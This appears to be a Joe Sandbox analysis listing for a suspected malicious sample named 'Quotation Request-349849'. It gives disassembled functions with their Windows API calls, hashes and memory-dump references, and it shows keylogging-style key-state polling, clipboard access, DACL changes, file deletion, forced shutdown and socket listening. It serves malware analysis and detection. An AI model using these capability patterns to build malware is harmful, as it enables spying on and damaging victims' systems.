                                                        • Part of subcall function 0082829F: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00827CF8,?), ref: 008282C3
                                                      • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00827D13
                                                      • _memset.LIBCMT ref: 00827D28
                                                      • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00827D47
                                                      • GetLengthSid.ADVAPI32(?), ref: 00827D58
                                                      • GetAce.ADVAPI32(?,00000000,?), ref: 00827D95
                                                      • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00827DB1
                                                      • GetLengthSid.ADVAPI32(?), ref: 00827DCE
                                                      • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00827DDD
                                                      • HeapAlloc.KERNEL32(00000000), ref: 00827DE4
                                                      • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00827E05
                                                      • CopySid.ADVAPI32(00000000), ref: 00827E0C
                                                      • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00827E3D
                                                      • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00827E63
                                                      • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00827E77
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                      • String ID:
                                                      • API String ID: 3996160137-0
                                                      • Opcode ID: ef0554ffddd5ef9c4770e8975d694b4ba38bec570ccb22fd099919bb8f61c380
                                                      • Instruction ID: 16158029208b765c815950d9313e075f275e9b699cfe05e1aaa58c802a69f629
                                                      • Opcode Fuzzy Hash: ef0554ffddd5ef9c4770e8975d694b4ba38bec570ccb22fd099919bb8f61c380
                                                      • Instruction Fuzzy Hash: D9618A74900629EFDF00DFA5EC84AEEBBB9FF04701F048169E911E72A1DB349A45CB60
                                                      Function 007E66E1 Relevance: 20.9, Strings: 16, Instructions: 889COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 3c~$ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)$_~
                                                      • API String ID: 0-3820626175
                                                      • Opcode ID: 313b8a5d72cfbeea0e5ff818208b9998bb2af4afc2889185249d16c4510837fb
                                                      • Instruction ID: fee7c67513490f2a8dfe87b84a9ac4182d002c7013cc69c5b6ba29701c238bb7
                                                      • Opcode Fuzzy Hash: 313b8a5d72cfbeea0e5ff818208b9998bb2af4afc2889185249d16c4510837fb
                                                      • Instruction Fuzzy Hash: AD7293B1E01269DBDF14CF59D8847AEB7B5FF58310F24816AE909EB290D7349E81CB90
                                                      Function 0083001C Relevance: 18.2, APIs: 12, Instructions: 186keyboardCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetKeyboardState.USER32(?), ref: 00830097
                                                      • SetKeyboardState.USER32(?), ref: 00830102
                                                      • GetAsyncKeyState.USER32(000000A0), ref: 00830122
                                                      • GetKeyState.USER32(000000A0), ref: 00830139
                                                      • GetAsyncKeyState.USER32(000000A1), ref: 00830168
                                                      • GetKeyState.USER32(000000A1), ref: 00830179
                                                      • GetAsyncKeyState.USER32(00000011), ref: 008301A5
                                                      • GetKeyState.USER32(00000011), ref: 008301B3
                                                      • GetAsyncKeyState.USER32(00000012), ref: 008301DC
                                                      • GetKeyState.USER32(00000012), ref: 008301EA
                                                      • GetAsyncKeyState.USER32(0000005B), ref: 00830213
                                                      • GetKeyState.USER32(0000005B), ref: 00830221
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: State$Async$Keyboard
                                                      • String ID:
                                                      • API String ID: 541375521-0
                                                      • Opcode ID: 8785c47b47a25f78fa202eab1aeab957581cc4043387ca02c42f00778ed328c1
                                                      • Instruction ID: 410e542e7ade6d6f697ee9a8db9d49e861bfe00cdbecff1c3a2763062b07e135
                                                      • Opcode Fuzzy Hash: 8785c47b47a25f78fa202eab1aeab957581cc4043387ca02c42f00778ed328c1
                                                      • Instruction Fuzzy Hash: E951CD2090478819FB35D7A488747AABFB4FF41380F084599D5C1965C3DAA49B8CCFE2
                                                      Function 008503DA Relevance: 16.9, APIs: 11, Instructions: 397registryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00850E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0084FDAD,?,?), ref: 00850E31
                                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 008504AC
                                                        • Part of subcall function 007D9837: __itow.LIBCMT ref: 007D9862
                                                        • Part of subcall function 007D9837: __swprintf.LIBCMT ref: 007D98AC
                                                      • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 0085054B
                                                      • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 008505E3
                                                      • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00850822
                                                      • RegCloseKey.ADVAPI32(00000000), ref: 0085082F
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                                      • String ID:
                                                      • API String ID: 1240663315-0
                                                      • Opcode ID: 14a5e96c4947aead79da77e9032d707b60283fc24d8e73e09ef7561d66e717d6
                                                      • Instruction ID: 13356155da0436155c61bffb0dc690d0b01c464bba3b283b4adc21e0454fb448
                                                      • Opcode Fuzzy Hash: 14a5e96c4947aead79da77e9032d707b60283fc24d8e73e09ef7561d66e717d6
                                                      • Instruction Fuzzy Hash: F3E14C31604214EFCB14DF28C895D2ABBE4FF89715B04856DF94ADB2A2DB34E905CF92
                                                      Function 00844164 Relevance: 15.1, APIs: 10, Instructions: 83clipboardmemoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                      • String ID:
                                                      • API String ID: 1737998785-0
                                                      • Opcode ID: bbbdbafbdcf117d6c02203d373270266cfe31a81f38dee29179f4e3384027e44
                                                      • Instruction ID: bb8bf19aff4a0b09f8ad637292cd98dc65b72f4f128109dc855e4a300783e532
                                                      • Opcode Fuzzy Hash: bbbdbafbdcf117d6c02203d373270266cfe31a81f38dee29179f4e3384027e44
                                                      • Instruction Fuzzy Hash: A22181752003149FDB11AF64EC09B6E7BA8FF14751F14802AFA46DB2A2DB78AC41CB55
                                                      Function 008337EF Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 167fileCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 007D4750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,007D4743,?,?,007D37AE,?), ref: 007D4770
                                                        • Part of subcall function 00834A31: GetFileAttributesW.KERNEL32(?,0083370B), ref: 00834A32
                                                      • FindFirstFileW.KERNEL32(?,?), ref: 008338A3
                                                      • DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 0083394B
                                                      • MoveFileW.KERNEL32(?,?), ref: 0083395E
                                                      • DeleteFileW.KERNEL32(?,?,?,?,?), ref: 0083397B
                                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 0083399D
                                                      • FindClose.KERNEL32(00000000,?,?,?,?), ref: 008339B9
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
                                                      • String ID: \*.*
                                                      • API String ID: 4002782344-1173974218
                                                      • Opcode ID: 437ae56b4fa1b6309995ebd969151cec7ef944e9acd192dd42acb74f41e97322
                                                      • Instruction ID: 7bb96a48e5a76f89d1bbf848978a08514cbb50b431e910e7ba9a2ec3e8cf8959
                                                      • Opcode Fuzzy Hash: 437ae56b4fa1b6309995ebd969151cec7ef944e9acd192dd42acb74f41e97322
                                                      • Instruction Fuzzy Hash: 4851923180514CEACF05EBA4C9969EDB778FF51301F60406AE806B7291EF356F09CBA1
                                                      Function 0083F3F3 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 120filesleepCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 007D7DE1: _memmove.LIBCMT ref: 007D7E22
                                                      • FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 0083F440
                                                      • Sleep.KERNEL32(0000000A), ref: 0083F470
                                                      • _wcscmp.LIBCMT ref: 0083F484
                                                      • _wcscmp.LIBCMT ref: 0083F49F
                                                      • FindNextFileW.KERNEL32(?,?), ref: 0083F53D
                                                      • FindClose.KERNEL32(00000000), ref: 0083F553
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
                                                      • String ID: *.*
                                                      • API String ID: 713712311-438819550
                                                      • Opcode ID: 01a97ab714b73e5768d7ea4378830ab8d57ac8cba41e32bce8c6cc63d6f1fbff
                                                      • Instruction ID: 1ed3a47dedefb5ce9949166a2bd05836b44fb29a974eca99325993ee741a5969
                                                      • Opcode Fuzzy Hash: 01a97ab714b73e5768d7ea4378830ab8d57ac8cba41e32bce8c6cc63d6f1fbff
                                                      • Instruction Fuzzy Hash: 1D413971D0421A9FCF14EF68DC59AEEBBB8FF45310F144466E919E2292EB349A44CB90
                                                      Function 007E3030 Relevance: 11.1, APIs: 4, Strings: 2, Instructions: 587COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: __itow__swprintf
                                                      • String ID: 3c~$_~
                                                      • API String ID: 674341424-657907094
                                                      • Opcode ID: f6adf87e4152bd9246cf0b495b9431b13866659620a03c315ee8596a01fc3f16
                                                      • Instruction ID: fe285daa37ba2536d71365d07f1c4d4ae4cb433dd568408d096bbf6cbdd03ca4
                                                      • Opcode Fuzzy Hash: f6adf87e4152bd9246cf0b495b9431b13866659620a03c315ee8596a01fc3f16
                                                      • Instruction Fuzzy Hash: 89229A716083809FC724DF14C885BAAB7E8FF89714F10491DF99A97391EB39E944CB92
                                                      Function 007E5760 Relevance: 11.0, APIs: 7, Instructions: 532COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: _memmove
                                                      • String ID:
                                                      • API String ID: 4104443479-0
                                                      • Opcode ID: f56d1e56b7451f95ab42e45fa70f30304fe05cac0beff4d1408a50fb9834c2b6
                                                      • Instruction ID: 7131b7a2b8f4aa98b62d3ac69d6820684a14c84e5b338bef3eabe5b1ab3688d1
                                                      • Opcode Fuzzy Hash: f56d1e56b7451f95ab42e45fa70f30304fe05cac0beff4d1408a50fb9834c2b6
                                                      • Instruction Fuzzy Hash: F5128A70A00619DFDF04DFA9D985AEEB7F5FF48304F10452AE846E7252EB3AA950CB50
                                                      Function 00833B12 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 91fileCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 007D4750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,007D4743,?,?,007D37AE,?), ref: 007D4770
                                                        • Part of subcall function 00834A31: GetFileAttributesW.KERNEL32(?,0083370B), ref: 00834A32
                                                      • FindFirstFileW.KERNEL32(?,?), ref: 00833B89
                                                      • DeleteFileW.KERNEL32(?,?,?,?), ref: 00833BD9
                                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 00833BEA
                                                      • FindClose.KERNEL32(00000000), ref: 00833C01
                                                      • FindClose.KERNEL32(00000000), ref: 00833C0A
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                                      • String ID: \*.*
                                                      • API String ID: 2649000838-1173974218
                                                      • Opcode ID: 5b7ff5848dec072b41052c2e3d1a80ea17f3130d792ca233fce8e0dcf99874f7
                                                      • Instruction ID: 41ddb009c5e4e6eadc2f02037ed8ffa5b419fadb63987d201118ac2910122a1d
                                                      • Opcode Fuzzy Hash: 5b7ff5848dec072b41052c2e3d1a80ea17f3130d792ca233fce8e0dcf99874f7
                                                      • Instruction Fuzzy Hash: 2F316071008385DFC305EF64D8958AFB7B8BE95314F444D2EF4D592292EB29DA09CBA3
                                                      Function 008351BD Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 59shutdownCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 008287E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0082882B
                                                        • Part of subcall function 008287E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00828858
                                                        • Part of subcall function 008287E1: GetLastError.KERNEL32 ref: 00828865
                                                      • ExitWindowsEx.USER32(?,00000000), ref: 008351F9
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                      • String ID: $@$SeShutdownPrivilege
                                                      • API String ID: 2234035333-194228
                                                      • Opcode ID: 79c8a63a198f7ad35e3d21dd6050b7cb12f11f66838f93586886edb4de2a4aca
                                                      • Instruction ID: 3097fdcae59fb5c2071ce8b7732b0105f14344ba73be50e6b83c7bb5d90595db
                                                      • Opcode Fuzzy Hash: 79c8a63a198f7ad35e3d21dd6050b7cb12f11f66838f93586886edb4de2a4aca
                                                      • Instruction Fuzzy Hash: 0C0149317927156BFB287278AC8BFBB72A8FB84345F240421FD23E30D2DA515C0086D1
                                                      Function 00846283 Relevance: 9.1, APIs: 6, Instructions: 84networkCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 008462DC
                                                      • WSAGetLastError.WSOCK32(00000000), ref: 008462EB
                                                      • bind.WSOCK32(00000000,?,00000010), ref: 00846307
                                                      • listen.WSOCK32(00000000,00000005), ref: 00846316
                                                      • WSAGetLastError.WSOCK32(00000000), ref: 00846330
                                                      • closesocket.WSOCK32(00000000,00000000), ref: 00846344
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: ErrorLast$bindclosesocketlistensocket
                                                      • String ID:
                                                      • API String ID: 1279440585-0
                                                      • Opcode ID: 68c8fccbfbfda40b9e9b983e726906ca414e73b8ad839753ff24a8ed496485e1
                                                      • Instruction ID: 9c2cd2dadfd7970564f639dbc403598cc23837a159fec97180ee713acaa10ea3
                                                      • Opcode Fuzzy Hash: 68c8fccbfbfda40b9e9b983e726906ca414e73b8ad839753ff24a8ed496485e1
                                                      • Instruction Fuzzy Hash: 1321D0706002089FCB00EF68C849B6EB7B9FF49721F14416AEA16E73D2D774AC51CB52
                                                      Function 007E5520 Relevance: 8.0, APIs: 5, Instructions: 516COMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 007F0DB6: std::exception::exception.LIBCMT ref: 007F0DEC
                                                        • Part of subcall function 007F0DB6: __CxxThrowException@8.LIBCMT ref: 007F0E01
                                                      • _memmove.LIBCMT ref: 00820258
                                                      • _memmove.LIBCMT ref: 0082036D
                                                      • _memmove.LIBCMT ref: 00820414
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: _memmove$Exception@8Throwstd::exception::exception
                                                      • String ID:
                                                      • API String ID: 1300846289-0
                                                      • Opcode ID: c7f16194fb5989daf586d2d3103cd5064cfc4c03f0112e6af66e3cf65b049b83
                                                      • Instruction ID: a40c5570e58cc95bd8a96fb47445c2fd6d6d7bc09a14af1afc1aafa23a766ad3
                                                      • Opcode Fuzzy Hash: c7f16194fb5989daf586d2d3103cd5064cfc4c03f0112e6af66e3cf65b049b83
                                                      • Instruction Fuzzy Hash: 3C02B1B0A00219DBCF04DF69D985ABE7BB5FF48304F54806AE806DB356EB39D950CB91
                                                      Function 007D1287 Relevance: 7.9, APIs: 5, Instructions: 379COMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 007D2612: GetWindowLongW.USER32(?,000000EB), ref: 007D2623
                                                      • DefDlgProcW.USER32(?,?,?,?,?), ref: 007D19FA
                                                      • GetSysColor.USER32(0000000F), ref: 007D1A4E
                                                      • SetBkColor.GDI32(?,00000000), ref: 007D1A61
                                                        • Part of subcall function 007D1290: DefDlgProcW.USER32(?,00000020,?), ref: 007D12D8
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: ColorProc$LongWindow
                                                      • String ID:
                                                      • API String ID: 3744519093-0
                                                      • Opcode ID: a2727307c577ba6d2c750a3cf3c28ad7fbc00a8969c811d7d38fca2f6aaf2f08
                                                      • Instruction ID: a33eb94aa784dbf0154e97bf81a5fb5d32506c112433cf81c3ea8d802c6b209a
                                                      • Opcode Fuzzy Hash: a2727307c577ba6d2c750a3cf3c28ad7fbc00a8969c811d7d38fca2f6aaf2f08
                                                      • Instruction Fuzzy Hash: F6A15BB1106594BEE624AB3C4C58D7F3A7DFF81342B94411BF502E63D6DA2C9D0197B2
                                                      Function 0083BCBC Relevance: 7.6, APIs: 5, Instructions: 143fileCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • FindFirstFileW.KERNEL32(?,?), ref: 0083BCE6
                                                      • _wcscmp.LIBCMT ref: 0083BD16
                                                      • _wcscmp.LIBCMT ref: 0083BD2B
                                                      • FindNextFileW.KERNEL32(00000000,?), ref: 0083BD3C
                                                      • FindClose.KERNEL32(00000000,00000001,00000000), ref: 0083BD6C
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: Find$File_wcscmp$CloseFirstNext
                                                      • String ID:
